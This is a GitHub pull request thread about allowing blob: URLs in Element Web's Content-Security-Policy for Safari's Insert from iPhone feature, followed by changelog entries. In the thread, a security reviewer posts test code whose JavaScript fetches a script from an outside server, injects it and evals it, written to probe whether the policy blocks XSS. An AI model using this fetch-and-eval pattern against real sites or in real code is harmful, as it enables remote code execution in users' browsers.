Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

vector/index.html: Allow fetching blob urls #25336

Merged
merged 5 commits into from
May 25, 2023

Conversation

SuperKenVery
Copy link
Contributor

@SuperKenVery SuperKenVery commented May 11, 2023

Checklist

  • Tests written for new code (and old code if feasible)
  • Linter and other CI checks pass
  • Sign-off given on the changes (see CONTRIBUTING.md)
  • I think this is required for js to get data from blob urls
  • I can't understand why this is not secure...

This pr which adds support for Safari's Insert from iPhone or iPad needs this change.

Signed-off-by: 许煜恒 xyhken@icloud.com


Here's what your changelog entry will look like:

✨ Features

Type: enhancement

@SuperKenVery SuperKenVery requested a review from a team as a code owner May 11, 2023 11:01
@github-actions github-actions bot added the Z-Community-PR Issue is solved by a community member's PR label May 11, 2023
@t3chguy t3chguy requested a review from a team May 11, 2023 11:05
@t3chguy
Copy link
Member

t3chguy commented May 11, 2023

@vector-im/security should we be worried about the potential for XSS via an anchor tag pointing at a blob/data uri which gets executed on click?

@SuperKenVery
Copy link
Contributor Author

Hmmm... Do we actually execute any data dynamically loaded?

@t3chguy
Copy link
Member

t3chguy commented May 11, 2023

@SuperKenVery anchor tags get opened outside of the app, in the same or other tabs, so we wouldn't be the ones executing things. Malicious SVGs and PDFs come to mind though.

SuperKenVery and others added 2 commits May 11, 2023 20:52
Signed-off-by: 许煜恒 xyhken@icloud.com
…nto allow-js-blob

Signed-off-by: 许煜恒 xyhken@icloud.com
dkasak
dkasak previously requested changes May 11, 2023
Copy link
Member

@dkasak dkasak left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Any changes to the CSP should be carefully analyzed and substantiated. I want to start from a thorough understanding of why we need this change, as currently it's not very clear. Is something not working correctly? If so, when did it break?

The very point of a CSP is to decrease flexibility so that it cannot be exploited in a foreseen or unforeseen manner. Therefore, adding data: just for the sake of a potential future use is a no-go from my perspective.

@t3chguy
Copy link
Member

t3chguy commented May 11, 2023

@dkasak the feature wanting this is Safari's Insert from iPhone or iPad matrix-org/matrix-react-sdk#10851 which pastes a HTML img node with a blob src of the image being pasted

@SuperKenVery
Copy link
Contributor Author

I want to start from a thorough understanding of why we need this change, as currently it's not very clear.

Sorry about the confusion. I remember I edited the description to mention the other pull request that needed this change, but somehow it disappeared...

@SuperKenVery SuperKenVery changed the title vector/index.html: Allow fetching blob and data urls vector/index.html: Allow fetching blob urls May 11, 2023
@davidegirardi
Copy link

@SuperKenVery: Can you post a link to the documentation of Insert from iPhone or iPad?

@SuperKenVery
Copy link
Contributor Author

I (and t3chguy) wasn't able to find one for html. There is one for AppKit, though:
https://developer.apple.com/documentation/appkit/supporting_continuity_camera_in_your_mac_app?language=objc

@SuperKenVery
Copy link
Contributor Author

You can see our experiments (kinda reverse engineering :D) here:

#25327

@davidegirardi
Copy link

Thanks!

@davidegirardi
Copy link

I have been doing some digging:

  • Adding blob: does increase the possibilities for XSS since you gain more functions to retrieve your payloads
  • script-src in our CSP seems to block weaponisation. I wrote "seems" because what Apple devices actually do is quite undocumented and I don't have a couple of devices to properly investigate this
  • The behaviour is Apple-specific (or even Safari specific) and not documented so it's hard to properly evaluate ripple effects without some research effort

Because of the above, I'd err for caution and not change the CSP at this time.

Some links for future reference:

Some trivial example code to build upon for future testing:

<html>
    <head>
        <meta http-equiv="Content-Security-Policy" content="
            default-src 'none';
            style-src 'self' 'unsafe-inline' ;
            script-src 'self' 'wasm-unsafe-eval' https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ ;
            img-src * blob: data:;
            connect-src * blob:;
            font-src 'self' data: ;
            media-src * blob: data:;
            child-src * blob: data:;
            worker-src 'self' blob: ;
            frame-src * blob: data:;
            form-action 'self' ;
            manifest-src 'self' ;
        ">
    </head>
    <body>
    </body>
</html>
from http.server import HTTPServer, SimpleHTTPRequestHandler

class CORSRequestHandler(SimpleHTTPRequestHandler):
    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        super().end_headers()

httpd = HTTPServer(('0.0.0.0', 8080), CORSRequestHandler)
httpd.serve_forever()
const response1 = await fetch("http://python.server.tld:8080/a.js")
const textData1 = await response1.text();
var a = document.createElement('script');
a.innerHTML = textData1;
document.body.appendChild(a);
eval(textData1);

@SuperKenVery
Copy link
Contributor Author

From my point of view, while we should get CSP as tight as possible, it shouldn't block our own features, but should only restrict the attacker's power. It's another layer of security, rather than something decisive.

And, I can't understand what you mean by weaponisation and ripple effects. Would you please elaborate on them?

@SuperKenVery
Copy link
Contributor Author

Any updates?

Have you decided not to change the CSP, or are you still considering?

@davidegirardi
Copy link

From my point of view, while we should get CSP as tight as possible, it shouldn't block our own features, but should only restrict the attacker's power. It's another layer of security, rather than something decisive.

I agree, that part of the comment came mostly from reading the code that manages inserting from iPhone or iPad. There are a couple of things that are unclear. If you are willing to provide some extra information, we can probably get to the bottom of it together. I will re-read #25327 and add some questions there.

"Weaponisation" means actually exploiting a vulnerability to make some damage. In the case of an XSS, it could be reading the content of the local storage for example.
When I write "ripple effects" I mean those secondary effect of multiple features interacting with each other.

@SuperKenVery
Copy link
Contributor Author

Definitely happy to provide any extra information 😃 I'll try my best to answer those questions!

BTW, thanks for the clear clarification!

@davidegirardi
Copy link

Can you try to make the blob: prefix as long as possible and see if it still works? I would test:

  • blob:http:
  • blob:http://localhost
  • blob:http://localhost:8000
  • blob:http://localhost:8001 < this should fail

@SuperKenVery
Copy link
Contributor Author

image ![index html fuckgithub](https://github.com/vector-im/element-web/assets/39673849/886b2f94-6d2a-4af7-9982-b3211496a74c)

The second image is the index.html I used to test, unfortunately GitHub doesn't allow me to upload an HTML :(

It seems that the check is more strict than you expected :D

@davidegirardi
Copy link

I meant adding blob:http: and so on to the CSP and then testing the insert from iphone feature, sorry for the confusion.

@SuperKenVery
Copy link
Contributor Author

SuperKenVery commented May 16, 2023

Sorry about my little (if not zero) knowledge in developing web applications 🤣

blob:http: doesn't work (request blocked)
blob:http://localhost doesn't work (request blocked)
blob:http://localhost:8080 (My local server was at 8080) doesn't work (request blocked)
blob:http://localhost:8081 doesn't work (request blocked)

Below is a screenshot with blob:http::
image

@davidegirardi
Copy link

OK. What happens if you append a * to each of the patterns?

@SuperKenVery
Copy link
Contributor Author

blob:http:* doesn't work:
image
blob:http://* doesn't work.
blob:http://localhost/* doesn't work.
blob:http://localhost:8080/* doesn't work.
blob:http://localhost:8081/* doesn't work.

@davidegirardi
Copy link

I think we ruled out possible variations on the theme, both documented and undocumented. I think we can merge this @t3chguy.

@t3chguy
Copy link
Member

t3chguy commented May 17, 2023

@davidegirardi can we get a ✅ from you and I'll dismiss @dkasak's

@SuperKenVery
Copy link
Contributor Author

@t3chguy Hi, what should I do to get this merged?

I'm not very familiar with GitHub, but now it says "Code owner review required", but I see that there's already one approving review. Also, workflows aren't run automatically...

@t3chguy
Copy link
Member

t3chguy commented May 23, 2023

@SuperKenVery sorry I've been on holiday, workflows don't run automatically for first time contributors until they have 1 successful PR to a project, I'll try get back to this after catching up

Copy link
Member

@t3chguy t3chguy left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks!

@t3chguy t3chguy merged commit 6b7f71f into element-hq:develop May 25, 2023
netbsd-srcmastr pushed a commit to NetBSD/pkgsrc that referenced this pull request Jun 24, 2023
Changes in [1.11.34](https://github.com/vector-im/element-web/releases/tag/v1.11.34) (2023-06-20)
=================================================================================================

## ✨ Features
 * OIDC: add delegatedauthentication to validated server config ([\#11053](matrix-org/matrix-react-sdk#11053)). Contributed by @kerryarchibald.
 * Allow image pasting in plain mode in RTE ([\#11056](matrix-org/matrix-react-sdk#11056)). Contributed by @alunturner.
 * Show room options menu if "UIComponent.roomOptionsMenu" is enabled ([\#10365](matrix-org/matrix-react-sdk#10365)). Contributed by @maheichyk.
 * Allow image pasting in rich text mode in RTE ([\#11049](matrix-org/matrix-react-sdk#11049)). Contributed by @alunturner.
 * Update voice broadcast redaction to use MSC3912 `with_rel_type` instead of `with_relations` ([\#11014](matrix-org/matrix-react-sdk#11014)). Fixes #25471.
 * Add config to skip widget_build_url for DM rooms ([\#11044](matrix-org/matrix-react-sdk#11044)). Fixes vector-im/customer-retainer#74.
 * Inhibit interactions on forward dialog message previews ([\#11025](matrix-org/matrix-react-sdk#11025)). Fixes #23459.
 * Removed `DecryptionFailureBar.tsx` ([\#11027](matrix-org/matrix-react-sdk#11027)). Fixes element-hq/element-meta#1358. Contributed by @florianduros.

## 🐛 Bug Fixes
 * Fix translucent `TextualEvent` on search results panel ([\#10810](matrix-org/matrix-react-sdk#10810)). Fixes #25292. Contributed by @luixxiul.
 * Matrix matrix scheme permalink constructor not stripping query params ([\#11060](matrix-org/matrix-react-sdk#11060)). Fixes #25535.
 * Fix: "manually verify by text" does nothing ([\#11059](matrix-org/matrix-react-sdk#11059)). Fixes #25375. Contributed by @kerryarchibald.
 * Make group calls respect the ICE fallback setting ([\#11047](matrix-org/matrix-react-sdk#11047)). Fixes vector-im/voip-internal#65.
 * Align list items on the tooltip to the start ([\#11041](matrix-org/matrix-react-sdk#11041)). Fixes #25355. Contributed by @luixxiul.
 * Clear thread panel event permalink when changing rooms ([\#11024](matrix-org/matrix-react-sdk#11024)). Fixes #25484.
 * Fix spinner placement on pinned widgets being reloaded ([\#10970](matrix-org/matrix-react-sdk#10970)). Fixes #25431. Contributed by @luixxiul.

Changes in [1.11.33](https://github.com/vector-im/element-web/releases/tag/v1.11.33) (2023-06-09)
=================================================================================================

## 🐛 Bug Fixes
 * Bump matrix-react-sdk to v3.73.1 for matrix-js-sdk v26.0.1. Fixes #25526.

Changes in [1.11.32](https://github.com/vector-im/element-web/releases/tag/v1.11.32) (2023-06-06)
=================================================================================================

## ✨ Features
 * Redirect to the SSO page if `sso_redirect_options.on_welcome_page` is enabled and the URL hash is empty ([\#25495](element-hq/element-web#25495)). Contributed by @dhenneke.
 * vector/index.html: Allow fetching blob urls ([\#25336](element-hq/element-web#25336)). Contributed by @SuperKenVery.
 * When joining room in sub-space join the parents too ([\#11011](matrix-org/matrix-react-sdk#11011)).
 * Include thread replies in message previews ([\#10631](matrix-org/matrix-react-sdk#10631)). Fixes #23920.
 * Use semantic headings in space preferences ([\#11021](matrix-org/matrix-react-sdk#11021)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings - Ignored users ([\#11006](matrix-org/matrix-react-sdk#11006)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings - profile ([\#10973](matrix-org/matrix-react-sdk#10973)). Fixes #25461. Contributed by @kerryarchibald.
 * Use semantic headings in user settings - account ([\#10972](matrix-org/matrix-react-sdk#10972)). Contributed by @kerryarchibald.
 * Support `Insert from iPhone or iPad` in Safari ([\#10851](matrix-org/matrix-react-sdk#10851)). Fixes #25327. Contributed by @SuperKenVery.
 * Specify supportedStages for User Interactive Auth ([\#10975](matrix-org/matrix-react-sdk#10975)). Fixes #19605.
 * Pass device id to widgets ([\#10209](matrix-org/matrix-react-sdk#10209)). Contributed by @Fox32.
 * Use semantic headings in user settings - discovery ([\#10838](matrix-org/matrix-react-sdk#10838)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings -  Notifications ([\#10948](matrix-org/matrix-react-sdk#10948)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings - spellcheck and language ([\#10959](matrix-org/matrix-react-sdk#10959)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings Appearance ([\#10827](matrix-org/matrix-react-sdk#10827)). Contributed by @kerryarchibald.
 * Use semantic heading in user settings Sidebar & Voip ([\#10782](matrix-org/matrix-react-sdk#10782)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings Security ([\#10774](matrix-org/matrix-react-sdk#10774)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings - integrations and account deletion ([\#10837](matrix-org/matrix-react-sdk#10837)). Fixes #25378. Contributed by @kerryarchibald.
 * Use semantic headings in user settings Preferences ([\#10794](matrix-org/matrix-react-sdk#10794)). Contributed by @kerryarchibald.
 * Use semantic headings in user settings Keyboard ([\#10793](matrix-org/matrix-react-sdk#10793)). Contributed by @kerryarchibald.
 * RTE plain text mentions as pills ([\#10852](matrix-org/matrix-react-sdk#10852)). Contributed by @alunturner.
 * Allow welcome.html logo to be replaced by config ([\#25339](element-hq/element-web#25339)). Fixes #8636.
 * Use semantic headings in user settings Labs ([\#10773](matrix-org/matrix-react-sdk#10773)). Contributed by @kerryarchibald.
 * Use semantic list elements for menu lists and tab lists ([\#10902](matrix-org/matrix-react-sdk#10902)). Fixes #24928.
 * Fix aria-required-children axe violation ([\#10900](matrix-org/matrix-react-sdk#10900)). Fixes #25342.
 * Enable pagination for overlay timelines ([\#10757](matrix-org/matrix-react-sdk#10757)). Fixes vector-im/voip-internal#107.
 * Add tooltip to disabled invite button due to lack of permissions ([\#10869](matrix-org/matrix-react-sdk#10869)). Fixes #9824.
 * Respect configured auth_header_logo_url for default Welcome page ([\#10870](matrix-org/matrix-react-sdk#10870)).
 * Specify lazy loading for avatars ([\#10866](matrix-org/matrix-react-sdk#10866)). Fixes #1983.
 * Room and user mentions for plain text editor ([\#10665](matrix-org/matrix-react-sdk#10665)). Contributed by @alunturner.
 * Add audible notifcation on broadcast error ([\#10654](matrix-org/matrix-react-sdk#10654)). Fixes #25132.
 * Fall back from server generated thumbnail to original image ([\#10853](matrix-org/matrix-react-sdk#10853)).
 * Use semantically correct elements for room sublist context menu ([\#10831](matrix-org/matrix-react-sdk#10831)). Fixes vector-im/customer-retainer#46.
 * Avoid calling prepareToEncrypt onKeyDown ([\#10828](matrix-org/matrix-react-sdk#10828)).
 * Allows search to recognize full room links ([\#8275](matrix-org/matrix-react-sdk#8275)). Contributed by @bolu-tife.
 * "Show rooms with unread messages first" should not be on by default for new users ([\#10820](matrix-org/matrix-react-sdk#10820)). Fixes #25304. Contributed by @kerryarchibald.
 * Fix emitter handler leak in ThreadView ([\#10803](matrix-org/matrix-react-sdk#10803)).
 * Add better error for email invites without identity server ([\#10739](matrix-org/matrix-react-sdk#10739)). Fixes #16893.
 * Move reaction message previews out of labs ([\#10601](matrix-org/matrix-react-sdk#10601)). Fixes #25083.
 * Sort muted rooms to the bottom of their section of the room list ([\#10592](matrix-org/matrix-react-sdk#10592)). Fixes #25131. Contributed by @kerryarchibald.
 * Use semantic headings in user settings Help & About ([\#10752](matrix-org/matrix-react-sdk#10752)). Contributed by @kerryarchibald.
 * use ExternalLink components for external links ([\#10758](matrix-org/matrix-react-sdk#10758)). Contributed by @kerryarchibald.
 * Use semantic headings in space settings ([\#10751](matrix-org/matrix-react-sdk#10751)). Contributed by @kerryarchibald.
 * Use semantic headings for room settings content ([\#10734](matrix-org/matrix-react-sdk#10734)). Contributed by @kerryarchibald.

## 🐛 Bug Fixes
 * Use consistent fonts for Japanese text ([\#10980](matrix-org/matrix-react-sdk#10980)). Fixes #22333 and #23899.
 * Fix: server picker validates unselected option ([\#11020](matrix-org/matrix-react-sdk#11020)). Fixes #25488. Contributed by @kerryarchibald.
 * Fix room list notification badges going missing in compact layout ([\#11022](matrix-org/matrix-react-sdk#11022)). Fixes #25372.
 * Fix call to `startSingleSignOn` passing enum in place of idpId ([\#10998](matrix-org/matrix-react-sdk#10998)). Fixes #24953.
 * Remove hover effect from user name on a DM creation UI ([\#10887](matrix-org/matrix-react-sdk#10887)). Fixes #25305. Contributed by @luixxiul.
 * Fix layout regression in public space invite dialog ([\#11009](matrix-org/matrix-react-sdk#11009)). Fixes #25458.
 * Fix layout regression in session dropdown ([\#10999](matrix-org/matrix-react-sdk#10999)). Fixes #25448.
 * Fix spacing regression in user settings - roles & permissions ([\#10993](matrix-org/matrix-react-sdk#10993)). Fixes #25447 and #25451. Contributed by @kerryarchibald.
 * Fall back to receipt timestamp if we have no event (react-sdk part) ([\#10974](matrix-org/matrix-react-sdk#10974)). Fixes #10954. Contributed by @andybalaam.
 * Fix: Room header 'view your device list' does not link to new session manager ([\#10979](matrix-org/matrix-react-sdk#10979)). Fixes #25440. Contributed by @kerryarchibald.
 * Fix display of devices without encryption support in Settings dialog ([\#10977](matrix-org/matrix-react-sdk#10977)). Fixes #25413.
 * Use aria descriptions instead of labels for TextWithTooltip ([\#10952](matrix-org/matrix-react-sdk#10952)). Fixes #25398.
 * Use grapheme-splitter instead of lodash for saving emoji from being ripped apart ([\#10976](matrix-org/matrix-react-sdk#10976)). Fixes #22196.
 * Fix: content overflow in settings subsection ([\#10960](matrix-org/matrix-react-sdk#10960)). Fixes #25416. Contributed by @kerryarchibald.
 * Make `Privacy Notice` external link on integration manager ToS clickable ([\#10914](matrix-org/matrix-react-sdk#10914)). Fixes #25384. Contributed by @luixxiul.
 * Ensure that open message context menus are updated when the event is sent ([\#10950](matrix-org/matrix-react-sdk#10950)).
 * Ensure that open sticker picker dialogs are updated when the widget configuration is updated. ([\#10945](matrix-org/matrix-react-sdk#10945)).
 * Fix big emoji in replies ([\#10932](matrix-org/matrix-react-sdk#10932)). Fixes #24798.
 * Hide empty `MessageActionBar` on message edit history dialog ([\#10447](matrix-org/matrix-react-sdk#10447)). Fixes #24903. Contributed by @luixxiul.
 * Fix roving tab index getting confused after dragging space order ([\#10901](matrix-org/matrix-react-sdk#10901)).
 * Attempt a potential workaround for stuck notifs ([\#3384](matrix-org/matrix-js-sdk#3384)). Fixes element-hq/element-web#25406. Contributed by @andybalaam.
 * Handle trailing dot FQDNs for domain-specific config.json files ([\#25351](element-hq/element-web#25351)). Fixes #8858.
 * Ignore edits in message previews when they concern messages other than latest ([\#10868](matrix-org/matrix-react-sdk#10868)). Fixes #14872.
 * Send correct receipts when viewing a room ([\#10864](matrix-org/matrix-react-sdk#10864)). Fixes #25196.
 * Fix timeline search bar being overlapped by the right panel ([\#10809](matrix-org/matrix-react-sdk#10809)). Fixes #25291. Contributed by @luixxiul.
 * Fix the state shown for call in rooms ([\#10833](matrix-org/matrix-react-sdk#10833)).
 * Add string for membership event where both displayname & avatar change ([\#10880](matrix-org/matrix-react-sdk#10880)). Fixes #18026.
 * Fix people space notification badge not updating for new DM invites ([\#10849](matrix-org/matrix-react-sdk#10849)). Fixes #23248.
 * Fix regression in emoji picker order mangling after clearing filter ([\#10854](matrix-org/matrix-react-sdk#10854)). Fixes #25323.
 * Fix: Edit history modal crash ([\#10834](matrix-org/matrix-react-sdk#10834)). Fixes #25309. Contributed by @kerryarchibald.
 * Fix long room address and name not being clipped on room info card and update `_RoomSummaryCard.pcss` ([\#10811](matrix-org/matrix-react-sdk#10811)). Fixes #25293. Contributed by @luixxiul.
 * Treat thumbnail upload failures as complete upload failures ([\#10829](matrix-org/matrix-react-sdk#10829)). Fixes #7069.
 * Update finite automata to match user identifiers as per spec ([\#10798](matrix-org/matrix-react-sdk#10798)). Fixes #25246.
 * Fix icon on empty notification panel ([\#10817](matrix-org/matrix-react-sdk#10817)). Fixes #25298 and #25302. Contributed by @luixxiul.
 * Fix: Threads button is highlighted when I create a new room ([\#10819](matrix-org/matrix-react-sdk#10819)). Fixes #25284. Contributed by @kerryarchibald.
 * Fix the top heading of notification panel ([\#10818](matrix-org/matrix-react-sdk#10818)). Fixes #25303. Contributed by @luixxiul.
 * Fix the color of the verified E2EE icon on `RoomSummaryCard` ([\#10812](matrix-org/matrix-react-sdk#10812)). Fixes #25295. Contributed by @luixxiul.
 * Fix: No feedback when waiting for the server on a /delete_devices request with SSO ([\#10795](matrix-org/matrix-react-sdk#10795)). Fixes #23096. Contributed by @kerryarchibald.
 * Fix: reveal images when image previews are disabled ([\#10781](matrix-org/matrix-react-sdk#10781)). Fixes #25271. Contributed by @kerryarchibald.
 * Fix accessibility issues around the room list and space panel ([\#10717](matrix-org/matrix-react-sdk#10717)). Fixes #13345.
 * Ensure tooltip contents is linked via aria to the target element ([\#10729](matrix-org/matrix-react-sdk#10729)). Fixes vector-im/customer-retainer#43.

Changes in [1.11.31](https://github.com/vector-im/element-web/releases/tag/v1.11.31) (2023-05-10)
=================================================================================================

## ✨ Features
 * Improve Content-Security-Policy ([\#25210](element-hq/element-web#25210)).
 * Add UIFeature.locationSharing to hide location sharing ([\#10727](matrix-org/matrix-react-sdk#10727)).
 * Memoize field validation results ([\#10714](matrix-org/matrix-react-sdk#10714)).
 * Commands for plain text editor ([\#10567](matrix-org/matrix-react-sdk#10567)). Contributed by @alunturner.
 * Allow 16 lines of text in the rich text editors ([\#10670](matrix-org/matrix-react-sdk#10670)). Contributed by @alunturner.
 * Bail out of `RoomSettingsDialog` when room is not found ([\#10662](matrix-org/matrix-react-sdk#10662)). Contributed by @kerryarchibald.
 * Element-R: Populate device list for right-panel ([\#10671](matrix-org/matrix-react-sdk#10671)). Contributed by @florianduros.
 * Make existing and new issue URLs configurable ([\#10710](matrix-org/matrix-react-sdk#10710)). Fixes #24424.
 * Fix usages of ARIA tabpanel ([\#10628](matrix-org/matrix-react-sdk#10628)). Fixes #25016.
 * Element-R: Starting a DMs with a user ([\#10673](matrix-org/matrix-react-sdk#10673)). Contributed by @florianduros.
 * ARIA Accessibility improvements ([\#10675](matrix-org/matrix-react-sdk#10675)).
 * ARIA Accessibility improvements ([\#10674](matrix-org/matrix-react-sdk#10674)).
 * Add arrow key controls to emoji and reaction pickers ([\#10637](matrix-org/matrix-react-sdk#10637)). Fixes #17189.
 * Translate credits in help about section ([\#10676](matrix-org/matrix-react-sdk#10676)).

## 🐛 Bug Fixes
 * Fix: reveal images when image previews are disabled ([\#10781](matrix-org/matrix-react-sdk#10781)). Fixes #25271. Contributed by @kerryarchibald.
 * Fix autocomplete not resetting properly on message send ([\#10741](matrix-org/matrix-react-sdk#10741)). Fixes #25170.
 * Fix start_sso not working with guests disabled ([\#10720](matrix-org/matrix-react-sdk#10720)). Fixes #16624.
 * Fix soft crash with Element call widgets ([\#10684](matrix-org/matrix-react-sdk#10684)).
 * Send correct receipt when marking a room as read ([\#10730](matrix-org/matrix-react-sdk#10730)). Fixes #25207.
 * Offload some more waveform processing onto a worker ([\#9223](matrix-org/matrix-react-sdk#9223)). Fixes #19756.
 * Consolidate login errors ([\#10722](matrix-org/matrix-react-sdk#10722)). Fixes #17520.
 * Fix all rooms search generating permalinks to wrong room id ([\#10625](matrix-org/matrix-react-sdk#10625)). Fixes #25115.
 * Posthog properly handle Analytics ID changing from under us ([\#10702](matrix-org/matrix-react-sdk#10702)). Fixes #25187.
 * Fix Clock being read as an absolute time rather than duration ([\#10706](matrix-org/matrix-react-sdk#10706)). Fixes #22582.
 * Properly translate errors in `ChangePassword.tsx` so they show up translated to the user but not in our logs ([\#10615](matrix-org/matrix-react-sdk#10615)). Fixes #9597. Contributed by @MadLittleMods.
 * Honour feature toggles in guest mode ([\#10651](matrix-org/matrix-react-sdk#10651)). Fixes #24513. Contributed by @andybalaam.
 * Fix default content in devtools event sender ([\#10699](matrix-org/matrix-react-sdk#10699)). Contributed by @tulir.
 * Fix a crash when a call ends while you're in it ([\#10681](matrix-org/matrix-react-sdk#10681)). Fixes #25153.
 * Fix lack of screen reader indication when triggering auto complete ([\#10664](matrix-org/matrix-react-sdk#10664)). Fixes #11011.
 * Fix typing tile duplicating users ([\#10678](matrix-org/matrix-react-sdk#10678)). Fixes #25165.
 * Fix wrong room topic tooltip position ([\#10667](matrix-org/matrix-react-sdk#10667)). Fixes #25158.
 * Fix create subspace dialog not working ([\#10652](matrix-org/matrix-react-sdk#10652)). Fixes #24882.
su-ex added a commit to SchildiChat/element-desktop that referenced this pull request Dec 13, 2023
* Redirect to the SSO page if `sso_redirect_options.on_welcome_page` is enabled and the URL hash is empty ([\#25495](element-hq/element-web#25495)). Contributed by @dhenneke.
* vector/index.html: Allow fetching blob urls ([\#25336](element-hq/element-web#25336)). Contributed by @SuperKenVery.
* When joining room in sub-space join the parents too ([\#11011](matrix-org/matrix-react-sdk#11011)).
* Include thread replies in message previews ([\#10631](matrix-org/matrix-react-sdk#10631)). Fixes element-hq/element-web#23920.
* Use semantic headings in space preferences ([\#11021](matrix-org/matrix-react-sdk#11021)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - Ignored users ([\#11006](matrix-org/matrix-react-sdk#11006)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - profile ([\#10973](matrix-org/matrix-react-sdk#10973)). Fixes element-hq/element-web#25461. Contributed by @kerryarchibald.
* Use semantic headings in user settings - account ([\#10972](matrix-org/matrix-react-sdk#10972)). Contributed by @kerryarchibald.
* Support `Insert from iPhone or iPad` in Safari ([\#10851](matrix-org/matrix-react-sdk#10851)). Fixes element-hq/element-web#25327. Contributed by @SuperKenVery.
* Specify supportedStages for User Interactive Auth ([\#10975](matrix-org/matrix-react-sdk#10975)). Fixes element-hq/element-web#19605.
* Pass device id to widgets ([\#10209](matrix-org/matrix-react-sdk#10209)). Contributed by @Fox32.
* Use semantic headings in user settings - discovery ([\#10838](matrix-org/matrix-react-sdk#10838)). Contributed by @kerryarchibald.
* Use semantic headings in user settings -  Notifications ([\#10948](matrix-org/matrix-react-sdk#10948)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - spellcheck and language ([\#10959](matrix-org/matrix-react-sdk#10959)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Appearance ([\#10827](matrix-org/matrix-react-sdk#10827)). Contributed by @kerryarchibald.
* Use semantic heading in user settings Sidebar & Voip ([\#10782](matrix-org/matrix-react-sdk#10782)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Security ([\#10774](matrix-org/matrix-react-sdk#10774)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - integrations and account deletion ([\#10837](matrix-org/matrix-react-sdk#10837)). Fixes element-hq/element-web#25378. Contributed by @kerryarchibald.
* Use semantic headings in user settings Preferences ([\#10794](matrix-org/matrix-react-sdk#10794)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Keyboard ([\#10793](matrix-org/matrix-react-sdk#10793)). Contributed by @kerryarchibald.
* RTE plain text mentions as pills ([\#10852](matrix-org/matrix-react-sdk#10852)). Contributed by @alunturner.
* Allow welcome.html logo to be replaced by config ([\#25339](element-hq/element-web#25339)). Fixes element-hq/element-web#8636.
* Use semantic headings in user settings Labs ([\#10773](matrix-org/matrix-react-sdk#10773)). Contributed by @kerryarchibald.
* Use semantic list elements for menu lists and tab lists ([\#10902](matrix-org/matrix-react-sdk#10902)). Fixes element-hq/element-web#24928.
* Fix aria-required-children axe violation ([\#10900](matrix-org/matrix-react-sdk#10900)). Fixes element-hq/element-web#25342.
* Enable pagination for overlay timelines ([\#10757](matrix-org/matrix-react-sdk#10757)). Fixes vector-im/voip-internal#107.
* Add tooltip to disabled invite button due to lack of permissions ([\#10869](matrix-org/matrix-react-sdk#10869)). Fixes element-hq/element-web#9824.
* Respect configured auth_header_logo_url for default Welcome page ([\#10870](matrix-org/matrix-react-sdk#10870)).
* Specify lazy loading for avatars ([\#10866](matrix-org/matrix-react-sdk#10866)). Fixes element-hq/element-web#1983.
* Room and user mentions for plain text editor ([\#10665](matrix-org/matrix-react-sdk#10665)). Contributed by @alunturner.
* Add audible notifcation on broadcast error ([\#10654](matrix-org/matrix-react-sdk#10654)). Fixes element-hq/element-web#25132.
* Fall back from server generated thumbnail to original image ([\#10853](matrix-org/matrix-react-sdk#10853)).
* Use semantically correct elements for room sublist context menu ([\#10831](matrix-org/matrix-react-sdk#10831)). Fixes vector-im/customer-retainer#46.
* Avoid calling prepareToEncrypt onKeyDown ([\#10828](matrix-org/matrix-react-sdk#10828)).
* Allows search to recognize full room links ([\#8275](matrix-org/matrix-react-sdk#8275)). Contributed by @bolu-tife.
* "Show rooms with unread messages first" should not be on by default for new users ([\#10820](matrix-org/matrix-react-sdk#10820)). Fixes element-hq/element-web#25304. Contributed by @kerryarchibald.
* Fix emitter handler leak in ThreadView ([\#10803](matrix-org/matrix-react-sdk#10803)).
* Add better error for email invites without identity server ([\#10739](matrix-org/matrix-react-sdk#10739)). Fixes element-hq/element-web#16893.
* Move reaction message previews out of labs ([\#10601](matrix-org/matrix-react-sdk#10601)). Fixes element-hq/element-web#25083.
* Sort muted rooms to the bottom of their section of the room list ([\#10592](matrix-org/matrix-react-sdk#10592)). Fixes element-hq/element-web#25131. Contributed by @kerryarchibald.
* Use semantic headings in user settings Help & About ([\#10752](matrix-org/matrix-react-sdk#10752)). Contributed by @kerryarchibald.
* use ExternalLink components for external links ([\#10758](matrix-org/matrix-react-sdk#10758)). Contributed by @kerryarchibald.
* Use semantic headings in space settings ([\#10751](matrix-org/matrix-react-sdk#10751)). Contributed by @kerryarchibald.
* Use semantic headings for room settings content ([\#10734](matrix-org/matrix-react-sdk#10734)). Contributed by @kerryarchibald.
* Use consistent fonts for Japanese text ([\#10980](matrix-org/matrix-react-sdk#10980)). Fixes element-hq/element-web#22333 and element-hq/element-web#23899.
* Fix: server picker validates unselected option ([\#11020](matrix-org/matrix-react-sdk#11020)). Fixes element-hq/element-web#25488. Contributed by @kerryarchibald.
* Fix room list notification badges going missing in compact layout ([\#11022](matrix-org/matrix-react-sdk#11022)). Fixes element-hq/element-web#25372.
* Fix call to `startSingleSignOn` passing enum in place of idpId ([\#10998](matrix-org/matrix-react-sdk#10998)). Fixes element-hq/element-web#24953.
* Remove hover effect from user name on a DM creation UI ([\#10887](matrix-org/matrix-react-sdk#10887)). Fixes element-hq/element-web#25305. Contributed by @luixxiul.
* Fix layout regression in public space invite dialog ([\#11009](matrix-org/matrix-react-sdk#11009)). Fixes element-hq/element-web#25458.
* Fix layout regression in session dropdown ([\#10999](matrix-org/matrix-react-sdk#10999)). Fixes element-hq/element-web#25448.
